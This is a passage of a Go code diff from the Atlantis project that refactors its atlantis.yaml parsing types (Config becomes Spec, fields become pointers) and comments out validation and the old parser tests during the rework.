meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) var steps []runtime.Step - var stepsConfig []yaml.StepConfig + var stepsConfig []yaml.Step if stageName == PlanStageName { stepsConfig = workflow.Plan.Steps } else { @@ -143,7 +143,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge } for _, stepConfig := range stepsConfig { var step runtime.Step - switch stepConfig.StepType { + switch stepConfig.Key { case "init": step = &runtime.InitStep{ Meta: meta, @@ -162,7 +162,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge case "run": step = &runtime.RunStep{ Meta: meta, - Commands: stepConfig.Run, + Commands: stepConfig.StringVal, } } steps = append(steps, step) diff --git a/server/events/yaml/auto_plan.go b/server/events/yaml/auto_plan.go index 16bcb80f5b..00eb0cc79d 100644 --- a/server/events/yaml/auto_plan.go +++ b/server/events/yaml/auto_plan.go @@ -1,10 +1,6 @@ package yaml type AutoPlan struct { - WhenModified []string `yaml:"when_modified"` - Enabled bool `yaml:"enabled"` + WhenModified []string `yaml:"when_modified,omitempty"` + Enabled *bool `yaml:"enabled,omitempty"` } - -// NOTE: AutoPlan does not implement UnmarshalYAML because we are unable to set -// defaults for bool and []string fields and so we just use the normal yaml -// unmarshalling. 
diff --git a/server/events/yaml/auto_plan_test.go b/server/events/yaml/auto_plan_test.go index 2dd8a43ef9..04d517d94f 100644 --- a/server/events/yaml/auto_plan_test.go +++ b/server/events/yaml/auto_plan_test.go @@ -15,31 +15,53 @@ func TestAutoPlan_UnmarshalYAML(t *testing.T) { exp yaml.AutoPlan }{ { - description: "should use defaults", - input: ` -`, + description: "omit unset fields", + input: "", exp: yaml.AutoPlan{ - Enabled: false, + Enabled: nil, WhenModified: nil, }, }, { - description: "should use all set fields", + description: "all fields set", input: ` enabled: true when_modified: ["something-else"] `, exp: yaml.AutoPlan{ - Enabled: true, + Enabled: Bool(true), + WhenModified: []string{"something-else"}, + }, + }, + { + description: "enabled false", + input: ` +enabled: false +when_modified: ["something-else"] +`, + exp: yaml.AutoPlan{ + Enabled: Bool(false), WhenModified: []string{"something-else"}, }, }, + { + description: "modified elem empty", + input: ` +enabled: false +when_modified: +- +`, + exp: yaml.AutoPlan{ + Enabled: Bool(false), + WhenModified: []string{""}, + }, + }, } for _, c := range cases { t.Run(c.description, func(t *testing.T) { var a yaml.AutoPlan - err := yamlv2.Unmarshal([]byte(c.input), &a) + err := yamlv2.UnmarshalStrict([]byte(c.input), &a) Ok(t, err) Equals(t, c.exp, a) }) diff --git a/server/events/yaml/config.go b/server/events/yaml/config.go deleted file mode 100644 index cd8c4f26eb..0000000000 --- a/server/events/yaml/config.go +++ /dev/null @@ -1,7 +0,0 @@ -package yaml - -type Config struct { - Version int `yaml:"version"` - Projects []Project `yaml:"projects"` - Workflows map[string]Workflow `yaml:"workflows"` -} diff --git a/server/events/yaml/config_test.go b/server/events/yaml/config_test.go deleted file mode 100644 index df4bc9c541..0000000000 --- a/server/events/yaml/config_test.go +++ /dev/null @@ -1,74 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . 
"github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestConfig_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Config - }{ - { - description: "should be empty if nothing set", - input: `~`, - exp: yaml.Config{ - Version: 0, - Projects: nil, - Workflows: nil, - }, - }, - { - description: "should use values if set", - input: ` -version: 2 -projects: -- dir: mydir - workspace: myworkspace - workflow: default -workflows: - default: - plan: - steps: [] - apply: - steps: []`, - exp: yaml.Config{ - Version: 2, - Projects: []yaml.Project{ - { - Dir: "mydir", - Workflow: "default", - Workspace: "myworkspace", - AutoPlan: &yaml.AutoPlan{ - WhenModified: []string{"**/*.tf"}, - Enabled: true, - }, - }, - }, - Workflows: map[string]yaml.Workflow{ - "default": { - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{}, - }, - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{}, - }, - }, - }, - }, - }, - } - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var conf yaml.Config - err := yamlv2.Unmarshal([]byte(c.input), &conf) - Ok(t, err) - Equals(t, c.exp, conf) - }) - } -} diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go index 8612015043..f824737404 100644 --- a/server/events/yaml/parser_validator.go +++ b/server/events/yaml/parser_validator.go @@ -1,7 +1,6 @@ package yaml import ( - "fmt" "io/ioutil" "os" "path/filepath" @@ -18,50 +17,50 @@ type ParserValidator struct{} // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir. // If there was no config file, then this can be detected by checking the type // of error: os.IsNotExist(error). 
-func (r *ParserValidator) ReadConfig(repoDir string) (Config, error) { +func (r *ParserValidator) ReadConfig(repoDir string) (Spec, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) // NOTE: the error we return here must also be os.IsNotExist since that's // what our callers use to detect a missing config file. if err != nil && os.IsNotExist(err) { - return Config{}, err + return Spec{}, err } // If it exists but we couldn't read it return an error. if err != nil { - return Config{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) + return Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) } // If the config file exists, parse it. config, err := r.parseAndValidate(configData) if err != nil { - return Config{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) + return Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) } return config, err } -func (r *ParserValidator) parseAndValidate(configData []byte) (Config, error) { - var repoConfig Config +func (r *ParserValidator) parseAndValidate(configData []byte) (Spec, error) { + var repoConfig Spec if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { return repoConfig, err } // Validate version. - if repoConfig.Version != 2 { - // todo: this will fail old atlantis.yaml files, we should deal with them in a better way. - return repoConfig, errors.New("unknown version: must have \"version: 2\" set") - } - - // Validate projects. - if len(repoConfig.Projects) == 0 { - return repoConfig, errors.New("'projects' key must exist and contain at least one element") - } - - for i, project := range repoConfig.Projects { - if project.Dir == "" { - return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i) - } - } + //if repoConfig.Version != 2 { + // // todo: this will fail old atlantis.yaml files, we should deal with them in a better way. 
+ // return repoConfig, errors.New("unknown version: must have \"version: 2\" set") + //} + // + //// Validate projects. + //if len(repoConfig.Projects) == 0 { + // return repoConfig, errors.New("'projects' key must exist and contain at least one element") + //} + // + //for i, project := range repoConfig.Projects { + // if project.Dir == "" { + // return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i) + // } + //} return repoConfig, nil } diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index 4adc8ca34d..3081970892 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -1,508 +1,498 @@ package yaml_test -import ( - "io/ioutil" - "os" - "path/filepath" - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" -) - -func TestReadConfig_DirDoesNotExist(t *testing.T) { - r := yaml.ParserValidator{} - _, err := r.ReadConfig("/not/exist") - Assert(t, os.IsNotExist(err), "exp nil ptr") -} - -func TestReadConfig_FileDoesNotExist(t *testing.T) { - tmpDir, cleanup := TempDir(t) - defer cleanup() - - r := yaml.ParserValidator{} - _, err := r.ReadConfig(tmpDir) - Assert(t, os.IsNotExist(err), "exp nil ptr") -} - -func TestReadConfig_BadPermissions(t *testing.T) { - tmpDir, cleanup := TempDir(t) - defer cleanup() - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) - Ok(t, err) - - r := yaml.ParserValidator{} - _, err = r.ReadConfig(tmpDir) - ErrContains(t, "unable to read atlantis.yaml file: ", err) -} - -func TestReadConfig_UnmarshalErrors(t *testing.T) { - // We only have a few cases here because we assume the YAML library to be - // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. 
- cases := []struct { - description string - input string - expErr string - }{ - { - "random characters", - "slkjds", - "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into yaml.Config", - }, - { - "just a colon", - ":", - "parsing atlantis.yaml: yaml: did not find expected key", - }, - } - - tmpDir, cleanup := TempDir(t) - defer cleanup() - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) - Ok(t, err) - r := yaml.ParserValidator{} - _, err = r.ReadConfig(tmpDir) - ErrEquals(t, c.expErr, err) - }) - } -} - -func TestReadConfig_Invalid(t *testing.T) { - cases := []struct { - description string - input string - expErr string - }{ - // Invalid version. - { - description: "no version", - input: ` -projects: -- dir: "." -`, - expErr: "unknown version: must have \"version: 2\" set", - }, - { - description: "unsupported version", - input: ` -version: 0 -projects: -- dir: "." -`, - expErr: "unknown version: must have \"version: 2\" set", - }, - { - description: "empty version", - input: ` -version: ~ -projects: -- dir: "." -`, - expErr: "unknown version: must have \"version: 2\" set", - }, - - // No projects specified. - { - description: "no projects key", - input: `version: 2`, - expErr: "'projects' key must exist and contain at least one element", - }, - { - description: "empty projects list", - input: ` -version: 2 -projects:`, - expErr: "'projects' key must exist and contain at least one element", - }, - - // Project must have dir set. 
- { - description: "project with no config", - input: ` -version: 2 -projects: --`, - expErr: "project at index 0 invalid: dir key must be set and non-empty", - }, - { - description: "project without dir set", - input: ` -version: 2 -projects: -- workspace: "staging"`, - expErr: "project at index 0 invalid: dir key must be set and non-empty", - }, - { - description: "project with dir set to empty string", - input: ` -version: 2 -projects: -- dir: ""`, - expErr: "project at index 0 invalid: dir key must be set and non-empty", - }, - { - description: "project with no config at index 1", - input: ` -version: 2 -projects: -- dir: "." --`, - expErr: "project at index 1 invalid: dir key must be set and non-empty", - }, - { - description: "project with unknown key", - input: ` -version: 2 -projects: -- unknown: value`, - expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", - }, - } - - tmpDir, cleanup := TempDir(t) - defer cleanup() - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) - Ok(t, err) - - r := yaml.ParserValidator{} - _, err = r.ReadConfig(tmpDir) - ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) - }) - } -} - -func TestReadConfig_Successes(t *testing.T) { - basicProjects := []yaml.Project{ - { - AutoPlan: &yaml.AutoPlan{ - Enabled: true, - WhenModified: []string{"**/*.tf"}, - }, - Workspace: "default", - TerraformVersion: "", - ApplyRequirements: nil, - Workflow: "", - Dir: ".", - }, - } - - cases := []struct { - description string - input string - expOutput yaml.Config - }{ - { - description: "uses project defaults", - input: ` -version: 2 -projects: -- dir: "."`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - }, - }, - { - description: "autoplan is enabled by default", - input: ` -version: 2 -projects: -- dir: "." 
- auto_plan: - when_modified: ["**/*.tf"] -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - }, - }, - { - description: "if workflows not defined, there are none", - input: ` -version: 2 -projects: -- dir: "." -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - }, - }, - { - description: "if workflows key set but with no workflows there are none", - input: ` -version: 2 -projects: -- dir: "." -workflows: ~ -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - }, - }, - { - description: "if a workflow is defined but set to null we use the defaults", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: ~ -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "apply", - }, - }, - }, - }, - }, - }, - }, - { - description: "if a plan or apply has no steps defined then we use the defaults", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - apply: -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "apply", - }, - }, - }, - }, - }, - }, - }, - { - description: "if a plan or apply explicitly defines an empty steps key then there are no steps", - input: ` -version: 2 -projects: -- dir: "." 
-workflows: - default: - plan: - steps: - apply: - steps: -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: nil, - }, - Apply: &yaml.Stage{ - Steps: nil, - }, - }, - }, - }, - }, - { - description: "if steps are set then we parse them properly", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - init - - plan - apply: - steps: - - plan # we don't validate if they make sense - - apply -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "plan", - }, - { - StepType: "apply", - }, - }, - }, - }, - }, - }, - }, - { - description: "we parse extra_args for the steps", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - init: - extra_args: [] - - plan: - extra_args: - - arg1 - - arg2 - apply: - steps: - - plan: - extra_args: [a, b] - - apply: - extra_args: ["a", "b"] -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - ExtraArgs: []string{}, - }, - { - StepType: "plan", - ExtraArgs: []string{"arg1", "arg2"}, - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "plan", - ExtraArgs: []string{"a", "b"}, - }, - { - StepType: "apply", - ExtraArgs: []string{"a", "b"}, - }, - }, - }, - }, - }, - }, - }, - { - description: "custom steps are parsed", - input: ` -version: 2 -projects: -- dir: "." 
-workflows: - default: - plan: - steps: - - run: "echo \"plan hi\"" - apply: - steps: - - run: echo apply "arg 2" -`, - expOutput: yaml.Config{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]yaml.Workflow{ - "default": { - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "run", - Run: []string{"echo", "plan hi"}, - }, - }, - }, - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "run", - Run: []string{"echo", "apply", "arg 2"}, - }, - }, - }, - }, - }, - }, - }, - } - - tmpDir, cleanup := TempDir(t) - defer cleanup() - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) - Ok(t, err) - - r := yaml.ParserValidator{} - act, err := r.ReadConfig(tmpDir) - Ok(t, err) - Equals(t, c.expOutput, act) - }) - } -} +//func TestReadConfig_DirDoesNotExist(t *testing.T) { +// r := yaml.ParserValidator{} +// _, err := r.ReadConfig("/not/exist") +// Assert(t, os.IsNotExist(err), "exp nil ptr") +//} +// +//func TestReadConfig_FileDoesNotExist(t *testing.T) { +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// r := yaml.ParserValidator{} +// _, err := r.ReadConfig(tmpDir) +// Assert(t, os.IsNotExist(err), "exp nil ptr") +//} +// +//func TestReadConfig_BadPermissions(t *testing.T) { +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) +// Ok(t, err) +// +// r := yaml.ParserValidator{} +// _, err = r.ReadConfig(tmpDir) +// ErrContains(t, "unable to read atlantis.yaml file: ", err) +//} +// +//func TestReadConfig_UnmarshalErrors(t *testing.T) { +// // We only have a few cases here because we assume the YAML library to be +// // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. 
+// cases := []struct { +// description string +// input string +// expErr string +// }{ +// { +// "random characters", +// "slkjds", +// "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into yaml.Spec", +// }, +// { +// "just a colon", +// ":", +// "parsing atlantis.yaml: yaml: did not find expected key", +// }, +// } +// +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// for _, c := range cases { +// t.Run(c.description, func(t *testing.T) { +// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) +// Ok(t, err) +// r := yaml.ParserValidator{} +// _, err = r.ReadConfig(tmpDir) +// ErrEquals(t, c.expErr, err) +// }) +// } +//} +// +//func TestReadConfig_Invalid(t *testing.T) { +// cases := []struct { +// description string +// input string +// expErr string +// }{ +// // Invalid version. +// { +// description: "no version", +// input: ` +//projects: +//- dir: "." +//`, +// expErr: "unknown version: must have \"version: 2\" set", +// }, +// { +// description: "unsupported version", +// input: ` +//version: 0 +//projects: +//- dir: "." +//`, +// expErr: "unknown version: must have \"version: 2\" set", +// }, +// { +// description: "empty version", +// input: ` +//version: ~ +//projects: +//- dir: "." +//`, +// expErr: "unknown version: must have \"version: 2\" set", +// }, +// +// // No projects specified. +// { +// description: "no projects key", +// input: `version: 2`, +// expErr: "'projects' key must exist and contain at least one element", +// }, +// { +// description: "empty projects list", +// input: ` +//version: 2 +//projects:`, +// expErr: "'projects' key must exist and contain at least one element", +// }, +// +// // Project must have dir set. 
+// { +// description: "project with no config", +// input: ` +//version: 2 +//projects: +//-`, +// expErr: "project at index 0 invalid: dir key must be set and non-empty", +// }, +// { +// description: "project without dir set", +// input: ` +//version: 2 +//projects: +//- workspace: "staging"`, +// expErr: "project at index 0 invalid: dir key must be set and non-empty", +// }, +// { +// description: "project with dir set to empty string", +// input: ` +//version: 2 +//projects: +//- dir: ""`, +// expErr: "project at index 0 invalid: dir key must be set and non-empty", +// }, +// { +// description: "project with no config at index 1", +// input: ` +//version: 2 +//projects: +//- dir: "." +//-`, +// expErr: "project at index 1 invalid: dir key must be set and non-empty", +// }, +// { +// description: "project with unknown key", +// input: ` +//version: 2 +//projects: +//- unknown: value`, +// expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", +// }, +// } +// +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// for _, c := range cases { +// t.Run(c.description, func(t *testing.T) { +// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) +// Ok(t, err) +// +// r := yaml.ParserValidator{} +// _, err = r.ReadConfig(tmpDir) +// ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) +// }) +// } +//} +// +//func TestReadConfig_Successes(t *testing.T) { +// basicProjects := []yaml.Project{ +// { +// AutoPlan: &yaml.AutoPlan{ +// Enabled: true, +// WhenModified: []string{"**/*.tf"}, +// }, +// Workspace: "default", +// TerraformVersion: "", +// ApplyRequirements: nil, +// Workflow: "", +// Dir: ".", +// }, +// } +// +// cases := []struct { +// description string +// input string +// expOutput yaml.Spec +// }{ +// { +// description: "uses project defaults", +// input: ` +//version: 2 +//projects: +//- dir: "."`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// }, +// 
}, +// { +// description: "autoplan is enabled by default", +// input: ` +//version: 2 +//projects: +//- dir: "." +// auto_plan: +// when_modified: ["**/*.tf"] +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// }, +// }, +// { +// description: "if workflows not defined, there are none", +// input: ` +//version: 2 +//projects: +//- dir: "." +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// }, +// }, +// { +// description: "if workflows key set but with no workflows there are none", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: ~ +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// }, +// }, +// { +// description: "if a workflow is defined but set to null we use the defaults", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: ~ +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "init", +// }, +// { +// StepType: "plan", +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "apply", +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// { +// description: "if a plan or apply has no steps defined then we use the defaults", +// input: ` +//version: 2 +//projects: +//- dir: "." 
+//workflows: +// default: +// plan: +// apply: +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "init", +// }, +// { +// StepType: "plan", +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "apply", +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// { +// description: "if a plan or apply explicitly defines an empty steps key then there are no steps", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: +// plan: +// steps: +// apply: +// steps: +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: nil, +// }, +// Apply: &yaml.Stage{ +// Steps: nil, +// }, +// }, +// }, +// }, +// }, +// { +// description: "if steps are set then we parse them properly", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: +// plan: +// steps: +// - init +// - plan +// apply: +// steps: +// - plan # we don't validate if they make sense +// - apply +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "init", +// }, +// { +// StepType: "plan", +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "plan", +// }, +// { +// StepType: "apply", +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// { +// description: "we parse extra_args for the steps", +// input: ` +//version: 2 +//projects: +//- dir: "." 
+//workflows: +// default: +// plan: +// steps: +// - init: +// extra_args: [] +// - plan: +// extra_args: +// - arg1 +// - arg2 +// apply: +// steps: +// - plan: +// extra_args: [a, b] +// - apply: +// extra_args: ["a", "b"] +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "init", +// ExtraArgs: []string{}, +// }, +// { +// StepType: "plan", +// ExtraArgs: []string{"arg1", "arg2"}, +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "plan", +// ExtraArgs: []string{"a", "b"}, +// }, +// { +// StepType: "apply", +// ExtraArgs: []string{"a", "b"}, +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// { +// description: "custom steps are parsed", +// input: ` +//version: 2 +//projects: +//- dir: "." +//workflows: +// default: +// plan: +// steps: +// - run: "echo \"plan hi\"" +// apply: +// steps: +// - run: echo apply "arg 2" +//`, +// expOutput: yaml.Spec{ +// Version: 2, +// Projects: basicProjects, +// Workflows: map[string]yaml.Workflow{ +// "default": { +// Plan: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "run", +// Run: []string{"echo", "plan hi"}, +// }, +// }, +// }, +// Apply: &yaml.Stage{ +// Steps: []yaml.Step{ +// { +// StepType: "run", +// Run: []string{"echo", "apply", "arg 2"}, +// }, +// }, +// }, +// }, +// }, +// }, +// }, +// } +// +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// for _, c := range cases { +// t.Run(c.description, func(t *testing.T) { +// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) +// Ok(t, err) +// +// r := yaml.ParserValidator{} +// act, err := r.ReadConfig(tmpDir) +// Ok(t, err) +// Equals(t, c.expOutput, act) +// }) +// } +//} diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go index 7a5730665f..d6d7e89e6d 100644 --- a/server/events/yaml/project.go 
+++ b/server/events/yaml/project.go @@ -1,30 +1,10 @@ package yaml type Project struct { - Dir string `yaml:"dir"` - Workspace string `yaml:"workspace"` - Workflow string `yaml:"workflow"` - TerraformVersion string `yaml:"terraform_version"` - AutoPlan AutoPlan `yaml:"auto_plan,omitempty"` - ApplyRequirements []string `yaml:"apply_requirements"` -} - -const DefaultWorkspace = "default" - -func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias Project - // Set up defaults. - defaults := alias{ - Workspace: DefaultWorkspace, - AutoPlan: AutoPlan{ - Enabled: true, - WhenModified: []string{"**/*.tf"}, - }, - } - if err := unmarshal(&defaults); err != nil { - return err - } - *p = Project(defaults) - return nil + Dir *string `yaml:"dir,omitempty"` + Workspace *string `yaml:"workspace,omitempty"` + Workflow *string `yaml:"workflow,omitempty"` + TerraformVersion *string `yaml:"terraform_version,omitempty"` + AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements,omitempty"` } diff --git a/server/events/yaml/project_test.go b/server/events/yaml/project_test.go index c3ab94d1db..0827bee733 100644 --- a/server/events/yaml/project_test.go +++ b/server/events/yaml/project_test.go @@ -15,23 +15,19 @@ func TestProject_UnmarshalYAML(t *testing.T) { exp yaml.Project }{ { - description: "should use defaults", - input: ` -dir: .`, + description: "omit unset fields", + input: "", exp: yaml.Project{ - Dir: ".", - Workspace: "default", - Workflow: "", - TerraformVersion: "", - AutoPlan: &yaml.AutoPlan{ - WhenModified: []string{"**/*.tf"}, - Enabled: true, - }, + Dir: nil, + Workspace: nil, + Workflow: nil, + TerraformVersion: nil, + AutoPlan: nil, ApplyRequirements: nil, }, }, { - description: "should use all set fields", + description: "all fields set", input: ` dir: mydir workspace: workspace @@ -43,13 +39,13 @@ auto_plan: 
apply_requirements: - mergeable`, exp: yaml.Project{ - Dir: "mydir", - Workspace: "workspace", - Workflow: "workflow", - TerraformVersion: "v0.11.0", + Dir: String("mydir"), + Workspace: String("workspace"), + Workflow: String("workflow"), + TerraformVersion: String("v0.11.0"), AutoPlan: &yaml.AutoPlan{ WhenModified: []string{}, - Enabled: false, + Enabled: Bool(false), }, ApplyRequirements: []string{"mergeable"}, }, @@ -59,7 +55,7 @@ apply_requirements: for _, c := range cases { t.Run(c.description, func(t *testing.T) { var p yaml.Project - err := yamlv2.Unmarshal([]byte(c.input), &p) + err := yamlv2.UnmarshalStrict([]byte(c.input), &p) Ok(t, err) Equals(t, c.exp, p) }) diff --git a/server/events/yaml/spec.go b/server/events/yaml/spec.go new file mode 100644 index 0000000000..874877f766 --- /dev/null +++ b/server/events/yaml/spec.go @@ -0,0 +1,7 @@ +package yaml + +type Spec struct { + Version *int `yaml:"version,omitempty"` + Projects []Project `yaml:"projects,omitempty"` + Workflows map[string]Workflow `yaml:"workflows,omitempty"` +} diff --git a/server/events/yaml/spec_test.go b/server/events/yaml/spec_test.go new file mode 100644 index 0000000000..6106e22a27 --- /dev/null +++ b/server/events/yaml/spec_test.go @@ -0,0 +1,152 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . 
"github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Spec + expErr string + }{ + { + description: "no data", + input: "", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "yaml nil", + input: "~", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "invalid key", + input: "invalid: key", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 1: field invalid not found in struct yaml.Spec", + }, + { + description: "version set", + input: "version: 2", + exp: yaml.Spec{ + Version: Int(2), + Projects: nil, + Workflows: nil, + }, + }, + { + description: "projects key without value", + input: "projects:", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "workflows key without value", + input: "workflows:", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "projects with a map", + input: "projects:\n key: value", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!map into []yaml.Project", + }, + { + description: "projects with a scalar", + input: "projects: value", + exp: yaml.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `value` into []yaml.Project", + }, + { + description: "should use values if set", + input: ` +version: 2 +projects: +- dir: mydir + workspace: myworkspace + workflow: default + terraform_version: v0.11.0 + auto_plan: + enabled: false + when_modified: [] + apply_requirements: [mergeable] +workflows: + default: + plan: + steps: [] + apply: + steps: []`, + exp: yaml.Spec{ + Version: Int(2), + Projects: 
